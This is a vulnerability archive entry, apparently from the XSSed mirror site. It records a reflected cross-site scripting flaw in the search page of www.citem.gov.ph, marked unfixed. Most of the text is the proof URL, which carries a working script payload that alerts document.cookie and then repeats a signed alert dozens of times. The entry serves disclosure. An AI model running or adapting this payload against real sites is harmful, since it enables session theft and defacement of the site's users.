Security researcher Pin0yeXpl0itTeam, has submitted on 03/08/2010 a cross-site-scripting (XSS) vulnerability affecting www.citem.gov.ph, which at the time of submission ranked 1341138 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 24/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 03/08/2010 |
Date published: 24/12/2011 |
Fixed? Mail us! | Status: UNFIXED |
Author: Pin0yeXpl0itTeam |
Domain: www.citem.gov.ph |
Category: XSS |
Pagerank: 1341138 |
URL: http://www.citem.gov.ph/catalogonline/main/search.php?keyword=%3Cscript%3Ealert%28document.cookie%29 %3C/script%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::: :[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTea m%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3 Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~ ~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%2 0~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20P in0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT %3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat91 12]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20 %20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/ XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.sourc e%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:: :::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0i tTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRI PT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::: :~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20% 20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By %20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SC RIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redh at9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%2 0%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert %28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.s ource%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~ ~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeX pl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3C SCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::: :::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20 %20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed% 20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3 C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[ Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam% 20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ea lert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~ ~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~ ~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin 0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3 E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112 ]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%2 0%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XS Sed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source% 29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::: :::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itT eam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT %3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~ ~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20 %20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%2 0Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRI PT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat 9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20% 20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%2 8/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.sou rce%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~ :::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl 0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSC RIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::: :::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%2 0%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20 By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/ SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Re dhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20 %20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Eale rt%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/ .source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~ ~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0y eXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E% 3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]: :::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20% 20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSe d%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29 %3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::: :[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTea m%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3 Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~ ~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%2 0~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20P in0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT %3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat91 12]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/XSSed%20By%20Pin0yeXpl0itTeam%20%20%20 %20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.source%29%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28/ XSSed%20By%20Pin0yeXpl0itTeam%20%20%20%20%20%20%20%20~~~~~~~:::::::[Redhat9112]::::::::~~~~~~/.sourc e%29%3C/SCRIPT%3E&searchtype=1&submit=+GO+ |
Click here to view the mirror
|
|
|